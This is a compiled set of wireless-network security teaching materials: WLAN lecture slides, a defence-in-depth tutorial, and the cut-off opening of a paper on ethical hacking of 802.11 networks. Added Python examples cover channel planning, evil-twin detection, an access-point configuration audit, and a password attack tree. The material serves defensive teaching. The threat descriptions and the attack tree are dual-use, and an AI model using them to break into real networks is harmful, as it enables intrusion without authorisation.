802.11b         2.4 GHz           Data rates up to 11 Mb/s; longer range than 802.11a and better able to penetrate building structures
802.11g         2.4 GHz           Data rates up to 54 Mb/s; backward compatible with 802.11b
802.11n         2.4 and 5 GHz     Data rates 150 – 600 Mb/s; requires multiple antennas with MIMO technology
802.11ac        5 GHz             Data rates 450 Mb/s – 1.3 Gb/s; supports up to eight antennas
802.11ax        2.4 and 5 GHz     High-Efficiency Wireless (HEW); capable of using 1 GHz and 7 GHz frequencies
Radio Frequencies
All wireless devices operate in the range of the electromagnetic spectrum.
WLAN networks operate in the 2.4 and 5 GHz frequency bands.
• 2.4 GHz – 802.11b/g/n/ax
• 5 GHz – 802.11a/n/ac/ax
Wireless Standards Organizations
Standards ensure interoperability between devices that are made by different
manufacturers. Internationally, the three organisations influencing WLAN
standards:
• International Telecommunication Union (ITU) – Regulates the allocation of
radio spectrum and satellite orbits.
• Institute of Electrical and Electronics Engineers (IEEE) – Specifies how a
radio frequency is modulated to carry information. Maintains the standards for
local and metropolitan area networks (MAN) with the IEEE 802 LAN/MAN
family of standards.
• Wi-Fi Alliance – Promotes the growth and acceptance of WLANs. It is an
association of vendors whose objective is to improve the interoperability of
products that are based on the 802.11 standard
WLAN Components

© 2016 Cisco and/or its affiliates. All rights reserved. Cisco Confidential 9
Wireless NICs
To communicate wirelessly, laptops, tablets, smartphones, and even the latest automobiles include integrated wireless NICs that incorporate a radio transmitter/receiver.
If a device does not have an integrated wireless NIC, then a USB
wireless adapter can be used.
Wireless Home Router
A home user typically interconnects wireless devices using a small wireless
router.
Wireless routers serve as the following:
• Access point – To provide wireless access
• Switch – To interconnect wired devices
• Router - To provide a default gateway to other networks and the Internet
Wireless Access Point

Wireless clients use their wireless NIC to discover nearby access points (APs). Clients then attempt to associate and authenticate with an AP. After being authenticated, wireless users have access to network resources.

Figure: Cisco Meraki Go access points


Wireless Antennas
Types of external antennas:
• Omnidirectional – Provide 360-degree coverage. Ideal in
houses and office areas.
• Directional – Focus the radio signal in a specific direction.
Examples are the Yagi and parabolic dish.
• Multiple Input Multiple Output (MIMO) – Uses multiple
antennas (Up to eight) to increase bandwidth.
WLAN Operation

802.11 Wireless Topology Modes

Ad hoc mode - Used to connect clients in a peer-to-peer manner without an AP.

Infrastructure mode - Used to connect clients to the network using an AP.

Tethering - A variation of the ad hoc topology is when a smartphone or tablet with cellular data access is enabled to create a personal hotspot.
WLAN Operation

BSS and ESS


Infrastructure mode defines two topology blocks:
Basic Service Set (BSS)
• Uses a single AP to interconnect all associated
wireless clients.
Extended Service Set (ESS)
• A union of two or more BSSs interconnected by a
wired distribution system.
• Clients in each BSS can communicate through the
ESS.
WLAN Operation

802.11 Frame Structure

The 802.11 frame format is similar to the Ethernet frame format, except that it contains more fields.
WLAN Operation

CSMA/CA
WLANs are half-duplex, and a client cannot “hear” while it is sending, making it impossible to
detect a collision.
WLANs use carrier sense multiple access with collision avoidance (CSMA/CA) to determine
how and when to send data. A wireless client does the following:
1. Listens to the channel to see if it is idle, i.e. no other traffic currently on the channel.
2. Sends a ready-to-send (RTS) message to the AP to request dedicated access to the network.
3. Receives a clear-to-send (CTS) message from the AP granting access to send.
4. Waits a random amount of time before restarting the process if no CTS message is received.
5. Transmits the data.
6. Acknowledges all transmissions. If a wireless client does not receive an acknowledgement, it assumes a collision occurred and restarts the process.
WLAN Operation
Wireless Client and AP Association

For wireless devices to communicate over a network, they must first associate with an AP or wireless router. Wireless devices complete the following three-stage process:
• Discover a wireless AP
• Authenticate with the AP
• Associate with the AP
WLAN Operation
Wireless Client and AP Association (Cont.)

To achieve a successful association, a wireless client and an AP must agree on specific parameters:
• SSID – The client needs to know the network’s name to connect.
• Password – This is required for the client to authenticate to the AP.
• Network mode – The 802.11 standard in use.
• Security mode – The security parameter settings, i.e. WEP, WPA, WPA2, WPA3
• Channel settings – The frequency bands in use.
Channel Management
Frequency Channel Saturation
Channel saturation can be mitigated using the following techniques:
• Direct-Sequence Spread Spectrum (DSSS) - A modulation technique to
spread a signal over a larger frequency band. Used by 802.11b devices to
avoid interference from other devices using the same 2.4 GHz frequency.
• Frequency-Hopping Spread Spectrum (FHSS) - Transmits radio signals by
rapidly switching a carrier signal among many frequency channels. The
sender and receiver must be synchronised to “know” which channel to jump
to. Used by the original 802.11 standards.
• Orthogonal Frequency-Division Multiplexing (OFDM) - A subset of
frequency division multiplexing in which a single channel uses multiple sub-
channels on adjacent frequencies. OFDM is used by several communication
systems, including 802.11a/g/n/ac.
Channel Management

Channel Selection
• The 2.4 GHz band is subdivided into multiple channels, each allotted 22 MHz
bandwidth and separated from the next channel by 5 MHz.
• A best practice for 802.11b/g/n WLANs requiring multiple APs is to use non-
overlapping channels such as 1, 6, and 11.
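An added example (not Cisco's or the lecture's code) that works through the channel numbers above: with 22 MHz channels centred 5 MHz apart, two channels overlap whenever their centre frequencies are less than 22 MHz apart, and a greedy walk up the band recovers the 1, 6, 11 plan. The centre-frequency formula (channel 1 at 2412 MHz, 5 MHz steps, channel 14 at 2484 MHz) is the standard 2.4 GHz channel plan, not something stated on the slide; which channels are available depends on the regulatory domain, so the set of candidate channels is a parameter.

```python
"""2.4 GHz channel overlap and non-overlapping channel planning.

Added example, not from the lecture. Channel width (22 MHz) and spacing
(5 MHz) are the slide's figures; centre frequencies follow the standard
2.4 GHz channel plan. Regulatory availability of channels is assumed to be
supplied by the caller (1-11 in the US, 1-13 in most of Europe).
"""
CHANNEL_WIDTH_MHZ = 22
CHANNEL_SPACING_MHZ = 5


def centre_frequency_mhz(channel: int) -> int:
    """Centre frequency of a 2.4 GHz 802.11 channel."""
    if 1 <= channel <= 13:
        return 2412 + CHANNEL_SPACING_MHZ * (channel - 1)
    if channel == 14:
        return 2484  # Japan-only, 802.11b
    raise ValueError(f"no 2.4 GHz channel {channel}")


def overlaps(a: int, b: int) -> bool:
    """Two 22 MHz channels overlap if their centres are closer than 22 MHz."""
    return abs(centre_frequency_mhz(a) - centre_frequency_mhz(b)) < CHANNEL_WIDTH_MHZ


def non_overlapping(channels) -> bool:
    """True if no pair of channels in the plan overlaps."""
    chans = list(channels)
    return all(not overlaps(a, b) for i, a in enumerate(chans) for b in chans[i + 1:])


def plan_channels(available=range(1, 12)) -> list:
    """Greedy plan: walk up the band keeping each channel that clears the ones kept."""
    chosen = []
    for ch in sorted(available):
        if all(not overlaps(ch, kept) for kept in chosen):
            chosen.append(ch)
    return chosen


if __name__ == "__main__":
    print("US plan:", plan_channels(range(1, 12)))      # [1, 6, 11]
    print("1,5,9 non-overlapping?", non_overlapping([1, 5, 9]))
```

Channels 1, 5 and 9 are only 20 MHz apart, which is why the "1, 5, 9, 13" plan sometimes seen in Europe is not strictly non-overlapping under the 22 MHz figure used on the slide.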
WLAN Threats

Wireless Security Overview

A WLAN is open to anyone within range of an AP and with the appropriate credentials to associate with it. Attacks can be generated by outsiders and disgruntled employees. Wireless networks are specifically susceptible to several threats, including the following:
• Interception of data
• Wireless intruders
• Denial of Service (DoS) Attacks
• Rogue APs
WLAN Threats

DoS Attacks
Wireless DoS attacks can be the result of the following:
• Improperly configured devices
• A malicious user intentionally interfering with the wireless
communication
• Accidental interference
To minimise the risk of a DoS attack due to improperly configured
devices and malicious attacks, harden all devices, keep passwords
secure, create backups, and ensure that all configuration changes are
incorporated off-hours.
WLAN Threats

Rogue Access Points

• A rogue AP is a wireless router connected to a corporate network without explicit authorisation and against corporate policy.
• Once connected, the rogue AP can be used by an attacker to capture MAC addresses, capture data packets, gain access to network resources, or launch a man-in-the-middle attack.
• A personal network hotspot could also be used as a rogue AP. For example, a user with secure network access enables their authorised Windows host to become a Wi-Fi AP.
• To prevent the installation of rogue APs, organisations must configure WLCs with rogue AP policies and use monitoring software to actively monitor the radio spectrum for unauthorised APs.
WLAN Threats

Man-in-the-Middle Attack

In a man-in-the-middle (MITM) attack, the hacker is positioned in between two legitimate entities to read or modify the data that passes between the two parties. A widespread wireless MITM attack is called the “evil twin AP” attack, where an attacker introduces a rogue AP and configures it with the same SSID as a legitimate AP.

Defeating a MITM attack begins with identifying legitimate devices on the WLAN. To do this, users must be authenticated. After all of the legitimate devices are known, the network can be monitored for abnormal devices or traffic.
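The monitoring step described for rogue APs and evil twins, as an added example that is not Cisco's or the lecture's code: once the authorised APs are known (here a constructed inventory keyed by BSSID), every observed beacon is classified against it. A beacon carrying the corporate SSID from a BSSID that was never deployed is the evil-twin case from the slide; a known BSSID advertising the wrong SSID or channel is inventory drift or spoofing. The beacon observations are constructed; in practice they come from a wireless IDS or a spectrum scan.

```python
"""Evil-twin and rogue-AP spotting from beacon observations.

Added example, not Cisco's or the lecture's code. The authorised-AP
inventory and the observed beacons are constructed; a wireless IDS or a
scan of the radio spectrum would supply the observations in practice.
"""

# Constructed inventory of the APs the organisation actually deployed
AUTHORISED_APS = {
    "00:11:22:aa:bb:01": {"ssid": "CorpWLAN", "channel": 1},
    "00:11:22:aa:bb:02": {"ssid": "CorpWLAN", "channel": 6},
}
CORPORATE_SSIDS = {ap["ssid"] for ap in AUTHORISED_APS.values()}

# Constructed beacon observations: what a monitoring radio sees in range
OBSERVED_BEACONS = [
    {"bssid": "00:11:22:aa:bb:01", "ssid": "CorpWLAN", "channel": 1, "rssi": -50},
    {"bssid": "de:ad:be:ef:00:01", "ssid": "CorpWLAN", "channel": 6, "rssi": -40},   # our SSID, unknown radio
    {"bssid": "00:11:22:aa:bb:02", "ssid": "CorpWLAN", "channel": 11, "rssi": -60},  # known radio, wrong channel
    {"bssid": "66:77:88:99:00:11", "ssid": "Neighbour-5G", "channel": 11, "rssi": -80},
]


def classify(beacon: dict) -> str:
    """Place one beacon into a category a wireless IDS would alert on."""
    known = AUTHORISED_APS.get(beacon["bssid"].lower())
    if known is not None:
        if known["ssid"] == beacon["ssid"] and known["channel"] == beacon["channel"]:
            return "authorised"
        return "authorised-mismatch"  # inventory drift, or a BSSID being spoofed
    if beacon["ssid"] in CORPORATE_SSIDS:
        return "evil-twin"            # advertises our SSID from a radio we never deployed
    return "unknown"                  # neighbour or personal hotspot; check the wired side separately


def scan_report(observed) -> dict:
    """Group BSSIDs by category; evil twins and mismatches go to the on-call queue."""
    report = {}
    for beacon in observed:
        report.setdefault(classify(beacon), []).append(beacon["bssid"])
    return report


def louder_than_legitimate(observed) -> list:
    """Evil twins win clients by signal strength: list twins whose RSSI beats
    every authorised AP advertising the same SSID."""
    strongest_auth = {}
    for b in observed:
        if classify(b) == "authorised":
            strongest_auth[b["ssid"]] = max(strongest_auth.get(b["ssid"], -200), b["rssi"])
    return [b["bssid"] for b in observed
            if classify(b) == "evil-twin" and b["rssi"] > strongest_auth.get(b["ssid"], -200)]


if __name__ == "__main__":
    for category, bssids in scan_report(OBSERVED_BEACONS).items():
        print(f"{category:20s} {bssids}")
    print("twins out-shouting legitimate APs:", louder_than_legitimate(OBSERVED_BEACONS))
```

The "unknown" bucket is deliberately not treated as an alert: a neighbour's network is not a rogue AP. Whether an unknown radio is plugged into the corporate LAN is a separate check on the wired side (switch port and MAC table), which the slide's WLC rogue policies perform.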
Secure WLANs
SSID Cloaking and MAC Address Filtering
To address the threats of keeping wireless intruders out and protecting data, two
early security features were used and are still available on most routers and APs:
SSID Cloaking
• APs and some wireless routers allow the SSID beacon frame to be disabled.
Wireless clients must be manually configured with the SSID to connect to the
network.
MAC Address Filtering
• An administrator can manually permit or deny clients wireless access based on
their physical MAC hardware address. In the figure, the router is configured to
permit two MAC addresses. Devices with different MAC addresses will not be
able to join the 2.4GHz WLAN.
Secure WLANs
802.11 Original Authentication Methods
The best way to secure a wireless network is to use authentication and
encryption systems. Two types of authentication were introduced with the original
802.11 standards:
Open system authentication
• No password required. Typically used to provide free internet access in public
areas like cafes, airports, and hotels.
• Client is responsible for providing security, such as through a VPN.
Shared key authentication
• Provides mechanisms, such as WEP, WPA, WPA2, and WPA3, to
authenticate and encrypt data between a wireless client and AP. However, the
password must be pre-shared between both parties to connect.
Secure WLANs
Shared Key Authentication Methods

Authentication Method            Description
Wired Equivalent Privacy (WEP)   The original 802.11 specification designed to secure the data using the Rivest Cipher 4 (RC4) encryption method with a static key. WEP is no longer recommended and should never be used.
Wi-Fi Protected Access (WPA)     A Wi-Fi Alliance standard that uses WEP but secures the data with the much stronger Temporal Key Integrity Protocol (TKIP) encryption algorithm. TKIP changes the key for each packet, making it much more difficult to hack.
WPA2                             It uses the Advanced Encryption Standard (AES) for encryption. AES is currently considered the strongest encryption protocol.
WPA3                             This is the next generation of Wi-Fi security. All WPA3-enabled devices use the latest security methods, disallow outdated legacy protocols, and require the use of Protected Management Frames (PMF).
Secure WLANs

WPA3
Because WPA2 is no longer considered secure, WPA3 is recommended when available. WPA3 includes four features:
• WPA3 – Personal: Thwarts brute force attacks by using Simultaneous Authentication of Equals (SAE).
• WPA3 – Enterprise: Uses 802.1X/EAP authentication. However, it requires using a 192-bit cryptographic suite and eliminates the mixing of security protocols from previous 802.11 standards.
• Open Networks: Does not use any authentication. However, it uses Opportunistic Wireless Encryption (OWE) to encrypt all wireless traffic.
• IoT Onboarding: Uses Device Provisioning Protocol (DPP) to quickly onboard IoT devices.
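An added example (not from Cisco's slides or the lecture) that turns the WEP / WPA / WPA2 / WPA3 comparison above into an audit check: a small parser for a hostapd-style access-point configuration and a rule set that flags WEP keys, WPA version 1, the TKIP cipher, management frames left unprotected, and a pre-shared key without SAE. The option names (`wpa`, `wpa_key_mgmt`, `wpa_pairwise`, `rsn_pairwise`, `ieee80211w`, `wep_key0`, `sae_password`) are real hostapd options; the three configurations are constructed, one weak WPA/TKIP setup, one legacy WEP setup and one hardened WPA3-Personal setup.

```python
"""Audit a hostapd-style AP configuration for the weak settings on the slides.

Added example, not part of the lecture. The option names are hostapd's own;
the three configurations below are constructed for illustration.
"""

# Key-management suites that do not rely on a bare WPA2 pre-shared key
ACCEPTED_KEY_MGMT = {"SAE", "WPA-EAP", "WPA-EAP-SUITE-B-192", "OWE"}

WEAK_WPA_TKIP = """
# constructed: WPA (version 1) with TKIP, no PMF
interface=wlan0
ssid=CorpWLAN
hw_mode=g
channel=6
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
wpa_passphrase=ChangeMe123
"""

LEGACY_WEP = """
# constructed: static WEP key, as on an old plant-floor AP
interface=wlan0
ssid=LegacyPLC
wep_default_key=0
wep_key0=0123456789
"""

HARDENED_WPA3 = """
# constructed: WPA3-Personal, CCMP only, PMF required
interface=wlan0
ssid=CorpWLAN
hw_mode=g
channel=6
wpa=2
wpa_key_mgmt=SAE
rsn_pairwise=CCMP
sae_password=correct-horse-battery-staple-example
ieee80211w=2
"""


def parse_hostapd(text: str) -> dict:
    """hostapd.conf is key=value per line; '#' starts a comment."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit(text: str) -> list:
    """Return (code, message) findings, strongest problems first."""
    conf = parse_hostapd(text)
    findings = []
    has_wep = any(k.startswith("wep_") for k in conf)
    wpa = int(conf.get("wpa", "0"))          # bit 0 = WPA, bit 1 = WPA2/RSN
    if has_wep:
        findings.append(("wep", "WEP keys configured: RC4 with a static key, should never be used"))
    if wpa == 0 and not has_wep:
        findings.append(("open", "no WPA/RSN configured: open network (WPA3 uses OWE to encrypt open-network traffic)"))
    if wpa & 1:
        findings.append(("wpa1", "WPA (version 1) enabled: relies on TKIP; use wpa=2 only"))
    ciphers = set(conf.get("wpa_pairwise", "").split()) | set(conf.get("rsn_pairwise", "").split())
    if "TKIP" in ciphers:
        findings.append(("tkip", "TKIP pairwise cipher allowed: use CCMP (AES) only"))
    if wpa and conf.get("ieee80211w", "0") != "2":
        findings.append(("pmf", "Protected Management Frames not required: set ieee80211w=2 (mandatory for WPA3)"))
    key_mgmt = set(conf.get("wpa_key_mgmt", "WPA-PSK").split())   # hostapd's default is WPA-PSK
    if wpa and not key_mgmt & ACCEPTED_KEY_MGMT:
        findings.append(("psk", "pre-shared key (WPA-PSK) without SAE: WPA3-Personal uses SAE against offline brute force"))
    return findings


if __name__ == "__main__":
    for name, text in [("weak WPA/TKIP", WEAK_WPA_TKIP), ("legacy WEP", LEGACY_WEP), ("hardened WPA3", HARDENED_WPA3)]:
        print(name, "->", [code for code, _ in audit(text)] or "no findings")
```

The check is intentionally conservative about transition modes: `wpa=3` (WPA and WPA2 together) still trips the `wpa1` rule, and a mixed `SAE WPA-PSK` key-management list passes the `psk` rule even though the PSK path remains available to old clients; both are deliberate trade-offs a deployment may need for a while, and the audit surfaces them rather than deciding for you.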
Summary
• Wireless LANs (WLANs) are based on IEEE standards and can be classified into four main
types: WPAN, WLAN, WMAN, and WWAN.
• Wireless technology uses the unlicensed radio spectrum to send and receive data.
Examples of this technology are Bluetooth, WiMAX, Cellular Broadband, and Satellite
Broadband.
• WLAN networks operate in the 2.4 GHz frequency band and the 5 GHz band.
• Wireless LAN devices have transmitters and receivers tuned to specific frequencies of radio
waves to communicate. Ranges are then split into smaller ranges called channels: DSSS,
FHSS, and OFDM.
• The 802.11b/g/n standards operate in the 2.4 GHz to 2.5GHz spectrum. The 2.4 GHz band
is subdivided into multiple channels. Each channel is allotted 22 MHz bandwidth and is
separated from the next channel by 5 MHz.
• Wireless networks are susceptible to threats, including data interception, wireless intruders,
DoS attacks, and rogue APs.
• There are four shared key authentication techniques available: WEP, WPA, WPA2, and WPA3.
Critical Systems Security
Week 7 Tutorial – Defence in Depth

Task 1.
Boundary Protection.
In groups, work through this network diagram, discuss which measures to put in place and
provide a brief rationale for each measure. (Approach this as an iterative design, showing
the evolution of the network design.)

Figure 1 - Network to segregate

Task 2.
In the same groups, or different ones, complete the following modelling.

1. RFID entry system. Block communication.
2. Accessing a bank account. ATM and online.
3. Attack tree on a password.
4. Compromise an air-gapped network.

For each of the above, produce the following:

Identify attack vectors,
Describe the attack surface,
Produce an attack tree.

Figure 2 - Compromising RFID – start of a possible solution

Task 3.
Consider further mitigation of the risks you have identified within your attack trees.
Consider the kill chain (SANS ICS Kill Chain white paper).
Example of an attack event: read the W32.Stuxnet Dossier.
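A worked example of what Task 2.3 and Task 3 ask for (an attack tree on a password, then ranking mitigations against it), written as an AND/OR tree evaluator. This is added illustration, not part of the tutorial sheet: the leaves, the control names (`strong_password`, `change_default`, `wpa3_sae`) and the relative effort costs are constructed to match the threats and recommendations discussed elsewhere in this document (weak or personal-information passwords, well-known default administrator passwords, WPA2 handshake capture followed by offline guessing), not measured values.

```python
from dataclasses import dataclass, field
from typing import List, Tuple

# Added example for Task 2.3 ("attack tree on a password"); not part of the tutorial sheet.
# Leaves, costs and control names are constructed illustrations: costs are relative effort
# units, not measurements. A leaf whose control is deployed gets MITIGATED_COST instead.
MITIGATED_COST = 50.0


@dataclass
class Node:
    name: str
    kind: str = "leaf"                 # "leaf", "or" (any child suffices) or "and" (all needed)
    cost: float = 0.0                  # attacker effort; only meaningful for leaves
    control: str = ""                  # defensive control that raises this leaf's cost
    children: List["Node"] = field(default_factory=list)

    def cheapest(self, controls: set) -> Tuple[float, List[str]]:
        """Least attacker effort to reach this node given deployed controls, plus the leaves used."""
        if self.kind == "leaf":
            cost = MITIGATED_COST if self.control and self.control in controls else self.cost
            return cost, [self.name]
        results = [child.cheapest(controls) for child in self.children]
        if self.kind == "or":
            return min(results, key=lambda r: r[0])
        # "and": every child must succeed, so efforts add up
        total = sum(r[0] for r in results)
        leaves = [leaf for r in results for leaf in r[1]]
        return total, leaves


def password_tree() -> Node:
    """Root goal: obtain the AP / Wi-Fi password. OR over three branches, one of them an AND."""
    return Node("Obtain the password", "or", children=[
        Node("Guess a weak or personal-information password", cost=2, control="strong_password"),
        Node("Use the well-known default administrator password", cost=1, control="change_default"),
        Node("Offline guess from a captured handshake", "and", children=[
            Node("Capture the WPA2 4-way handshake", cost=3),
            Node("Guess the passphrase offline from the handshake", cost=4, control="wpa3_sae"),
        ]),
    ])


def rank_controls(tree: Node, candidates: List[str], deployed: set) -> List[Tuple[str, float]]:
    """For each not-yet-deployed control, the cheapest attack cost if it were added.
    Sorted so the control that raises the attacker's floor the most comes first."""
    ranked = []
    for control in candidates:
        if control in deployed:
            continue
        cost, _ = tree.cheapest(deployed | {control})
        ranked.append((control, cost))
    ranked.sort(key=lambda item: -item[1])
    return ranked


if __name__ == "__main__":
    tree = password_tree()
    deployed = set()
    controls = ["strong_password", "change_default", "wpa3_sae"]
    # greedy mitigation plan: always add the control that raises the cheapest path the most
    for _ in controls:
        cost, path = tree.cheapest(deployed)
        print(f"controls={sorted(deployed)} cheapest={cost} via {path}")
        best, _ = rank_controls(tree, controls, deployed)[0]
        deployed.add(best)
    print("all controls deployed:", tree.cheapest(deployed))
```

With no controls the cheapest path is the default administrator password (cost 1); the greedy plan therefore picks `change_default` first, then `strong_password`, and only then `wpa3_sae`, which is the kind of ordering the "further mitigation" step in Task 3 asks you to justify.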
Journal of Modern Technology and Engineering
Vol.8, No.3, 2023, pp.207-219

ENHANCING WIRELESS NETWORK SECURITY VIA ETHICAL HACKING: STRATEGIES AND BEST PRACTICES

Salah Abdulghani Alabady1, Mohammed A. M. Abdullah2, Kaeed Ketab Kaeed1

1 College of Engineering, Computer Engineering Department, University of Mosul, Iraq
2 Computer and Information Engineering Department, College of Electronics Engineering, Ninevah University, Mosul, Iraq

Abstract. Wireless networks have experienced rapid expansion in recent years and are now one of the fastest-
growing industries in the telecommunications industry. Wireless communication technologies are popular due to
their advantages over wireline systems. The most significant advantage is the lack of cables, which permits the
three paradigms: communication everywhere, at any time, with anybody. However, the convenience of WLANs
brings greater security risks than security in the wired environment. Wireless communication data packets are in
the air and available to anyone who can intercept and decode them. So, the most significant source of risk in a
wireless network is that the technology underlying the communication medium, the airwave, is open to intruders.
This leads us to the idea of ethical hacking. Ethical hacking, often known as white-hat hacking, refers to the use
of hacking to test and strengthen defenses against unethical hackers. Ethical hacking employs the same tools and
tactics as unethical hacking, but it also requires substantial upfront planning, a set of specific tools, complicated
testing processes, and adequate follow-up to resolve any issues before unethical hacking exploits them. In this
paper, we aim to present various threats and vulnerabilities associated with 802.11-based wireless networks and
the possibility of ethical hacking to find the point of failure in trying to overcome these problems.

Keywords: Wireless Security, Ethical Hacking, IEEE 802.11, Performance Analysis


AMS Subject Classification: 68M15.
Corresponding author: Salah A. Alabady, College of Engineering, Computer Engineering Department, University of Mosul, Iraq, e-mail: [email protected]
Received: 12 February 2023; Revised: 18 July 2023; Accepted: 15 August 2023; Published: 30 December 2023.

1 Introduction
Wireless networks have experienced rapid expansion in recent years and are now one of the
fastest-growing industries in the telecoms sector. Wireless local area networks, cellular, cordless,
and satellite phones, as well as other wireless communication technologies, are now widely
used and regarded by many as indispensable tools for daily life. The benefits of wireless
communication systems over wired systems account for their growing popularity. The lack of cables,
which permits the three paradigms of communication (anywhere, anytime, with anyone), is the
main benefit.
It is important to note that current standards-based wireless LANs function at fast rates
Michael (2002). Typically, the speed ranges from 2 Mbps to over 54 Mbps. For a variety of
applications or services delivered via a PC or mobile device, this bandwidth is unquestionably
sufficient to provide an excellent user experience. Government organizations, individual con-
sumers, and commercial enterprises all utilize or are considering adopting wireless technologies.

207
JOURNAL OF MODERN TECHNOLOGY AND ENGINEERING, V.8, N.3, 2023

These organizations should be mindful of the security dangers connected to wireless technolo-
gies, though. As they integrate wireless technologies into their computer environments, agencies
must create measures to reduce hazards Gupta and Jha (2015), Alabady and Salleh (2013).
The main contribution of this paper is to present the main weaknesses of wireless networks and
proposed solutions and recommendations that can be adopted to protect the wireless network. In this
context, a simple network is designed to simulate a practical situation with an eavesdropping
point. Sniffing software is tested under both Windows and Linux environments, which demonstrates
the weakness of the old security protocol.
The remainder of this paper is organized as follows. In Section 2, the background is explained;
in Section 3, we review the related work. Section 4 describes the security characteristics of 802.11
wireless LANs. In Section 5, the practical work is evaluated and the results are shown. Finally,
Section 6 presents the recommendations and concluding remarks.

2 Background
Before diving into the details of wireless security, it is essential to know the wireless topology
and wireless standard protocols. These are going to be presented in the next sub-sections.

2.1 Wireless LANS Topology


In any wireless network, there are three topologies for wireless LANs:

• Infrastructure mode: An infrastructure topology extends a wired LAN to wireless devices
by providing a base station (also known as an access point). The access point serves as a
central controller for the wireless LAN by bridging the wireless and wired networks.

• Ad-hoc mode: In an ad-hoc topology, a LAN is built entirely by the wireless devices
themselves without the use of a central controller or access point. Instead of using a
centralized controller, each device connects directly with the other devices in the network.

• Mixed Network mode: Every wireless station can operate in both of the aforementioned
modes at once. The Extended Basic Service Set (EBSS) is another name for this Mao et al.
(2018).

2.2 Wireless LAN Standard


• 802.11b: 802.11b was long recognized as the most extensively used Wi-Fi standard. It
makes use of frequencies between 2.400 and 2.485 GHz. The maximum 802.11b speed is
11 Mbps.

• 802.11g: The 802.11g protocol was approved in 2003 to match the 54-Mbps speed claims
of 802.11a. This protocol used the 2.4 GHz band of 802.11b and the OFDM modula-
tion method from 802.11a. It was able to maintain backward compatibility with 802.11b
equipment because it operated at 2.4 GHz.

• 802.11n: For several years, the IEEE 802.11 Task Group n (TGn) has been developing
a new wireless standard that will offer significantly more application data throughput
than the current 802.11a/b/g wireless standards. Solutions built on the 802.11n standard will
support existing 802.11a/b/g deployments with a maximum data rate of 250 Mbps and
operate in the 2.4 GHz, 5 GHz, or both radio bands Bendale and Prasad (2018).

208
S.A. ALABADY et al. ENHANCING WIRELESS NETWORK SECURITY VIA ETHICAL HACKING...

• 802.11i: The Working Group of IEEE 802.11 has been working on MAC enhancement.
Task Group I (TGi) is working on security. It replaced the previous security rules by pro-
viding a Robust Security Network (RSN) with two new protocols: the group key handshake
and the four-way handshake. These employ the port access control and authentication ser-
vices mentioned in IEEE 802.1X to establish the appropriate cryptographic keys He et al.
(2019).

• 802.11ac: The fifth version of WiFi is known as 802.11ac or WiFi 5. It is an improvement
over IEEE 802.11n. In order to keep up with the increasing number of people, devices,
and data usage, WiFi 5 was intended to have faster speeds, better WiFi performance, and better
range. 802.11ac has a theoretical maximum speed of 1,300 Mbps (1.3 Gbps) to 2,300 Mbps
(2.3 Gbps). The channel bandwidth of 802.11ac supports a maximum of 80 MHz.

• 802.11ax: The newest form of wireless technology is known as Wi-Fi 6. Compared to
Wi-Fi 5, Wi-Fi 6 offers more coverage, longer battery life, and better performance. Wi-Fi
6 was initially intended to alleviate bandwidth issues in crowded, high-traffic areas like
trains, stadiums, airports, and offices. 802.11ax radios can operate in both the 2.4 GHz and
5 GHz frequency bands. By using multiple channels, Wi-Fi 6 could reach a maximum speed
of 9.6 Gbps.

3 Related work
The authors in Badholia et al. (2019) studied wireless network system (WNS) protocols, i.e.
WEP, WAP, and WPA2, and proposed an improved version of these protocols. Their new protocols
are built on algebraic, statistical, and logarithmic methods. Results indicate that the upgraded
versions of WEP, WAP, and WAP2 operate more effectively and securely. The authors of Faika et al.
(2019) suggested using blockchain technology to protect an IoT-enabled WBMS's communication and
data from harmful cyber-attacks. Their model is supported by the findings of their experiments:
each of the five IoT Raspberry Pi 3 boards has a smart contract installed on the Hyperledger
Fabric blockchain platform. In contrast to other blockchain platforms, they recommend using IBM's
Hyperledger Fabric, which they consider more relevant to IoT applications. Their findings offer the
possibility of improving the cyber security of WBMSs, which encourages the spread of Li-ion battery
systems in cyber-physical environments.
In order to authenticate wireless devices, Lin and Chang (2019) offer a radio frequency
fingerprint extraction technique based on the fractional Fourier transform of transient signals.
The findings demonstrate that this method's recognition rate is very near to 100% when the SNR
is 20 dB. Ten Motorola walkie-talkies were also used to test the effectiveness of the identification
procedure. The authors of Jilani et al. (2020) researched the risks associated with wireless sensor
networks. DoS attacks, black hole attacks, and wormhole attacks were shown to be the most frequent
dangers. They suggested a detection algorithm equipped to spot intrusions in realistic real-world
circumstances.
Kaur and Sandhu (2021) presented the various security measures that employ a machine learning
(ML) strategy to counter intrusion attempts on network data. They classify security attacks by
layer and kind and then use machine learning to represent the appropriate response. A table listing
each layer name and its associated procedures was also created. Using open-source software and
commercially available hardware, the authors of Hoseini et al. (2022) created a physical layer
security solution for protecting wireless communications. This solution took advantage of the
physical features of the wireless channel. In order to manage and degrade the quality of the
eavesdropper's channel, they practically manipulated the connectivity of the legitimate station
using the flexibility and control granularity offered by the relatively recent concept of spectrum
programming.


Their success is attributed to the idea of spectrum programming, which is relatively new and
enables the centralization of the required measurements and controls. Wu and Wu (2021)
investigated the security issues in wireless sensor network applications and the mechanisms for
protecting information security. They concluded that the only way to accelerate the advancement
of productive forces and information technology was to grasp the trend of scientific and
technological development and work to remove its shortcomings. The authors in Chen et al. (2021)
proposed a new data processing method called Hex Word2VecKMeans Smote (HWKS) to detect intrusions
in wireless networks. They also proposed an improved version of the Aegean WiFi Intrusion Dataset
(AWID) and support their proposal with experimental results which show that, on the one hand, the
HWKS method is reasonable and the new AWID is more effective and challenging; on the other hand,
data sets similar to AWID can be processed by the HWKS method, so the evaluation of different
research work will be consistent and comparable.
Wireless networks can be protected from potential threats by using the network security
monitoring system implemented by the authors in Maesaroh et al. (2022), which uses iptables
as an attack handler and Snort as a sensor engine. They found that the Intrusion Detection
System (IDS) detects threats by examining a variety of sources and network traffic.
Additionally, they found that a computer network can only be monitored by a machine
that functions as a sensor in the network and can observe all of the events that take place in it.
For wireless mobile networks, the authors of Anitha et al. (2022) propose a reliable communication
protocol with improved security handling capabilities, which they named the Novel Threat
Management Scheme (NTMS). They developed their method by combining two traditional methods,
AODV and data hashing, which together yield security effectiveness, data integrity level, access
control capabilities, and bandwidth utilization level.
Wi-Fi-related network attacks were researched by Liu (2022). By studying and evaluating
network attack behaviors connected to Wi-Fi, he sought to identify and analyze preventative
measures for wireless network security threats in order to enhance the security of the wireless
network. He examined real-world examples of wireless network threats before putting forward
